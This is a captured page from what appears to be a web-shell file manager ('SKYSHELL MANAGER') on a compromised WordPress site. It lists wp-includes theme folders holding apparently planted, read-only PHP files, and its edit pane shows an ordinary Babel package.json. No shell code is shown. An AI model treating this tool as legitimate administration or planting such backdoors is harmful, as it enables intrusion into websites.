📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "@babel/helper-compilation-targets", "version": "7.20.7", "author": "The Babel Team (https://babel.dev/team)", "license": "MIT", "description": "Helper functions on Babel compilation targets", "repository": { "type": "git", "url": "https://github.com/babel/babel.git", "directory": "packages/babel-helper-compilation-targets" }, "main": "./lib/index.js", "exports": { ".": "./lib/index.js", "./package.json": "./package.json" }, "publishConfig": { "access": "public" }, "keywords": [ "babel", "babel-plugin" ], "dependencies": { "@babel/compat-data": "workspace:^", "@babel/helper-validator-option": "workspace:^", "browserslist": "^4.21.3", "lru-cache": "condition:BABEL_8_BREAKING ? ^7.14.1 : ^5.1.1", "semver": "condition:BABEL_8_BREAKING ? ^7.3.4 : ^6.3.0" }, "peerDependencies": { "@babel/core": "^7.0.0" }, "devDependencies": { "@babel/core": "workspace:^", "@babel/helper-plugin-test-runner": "workspace:^", "@types/lru-cache": "^5.1.1", "@types/semver": "^5.5.0" }, "engines": { "node": ">=6.9.0" }, "type": "commonjs", "conditions": { "USE_ESM": [ { "type": "module" }, null ] } }
Save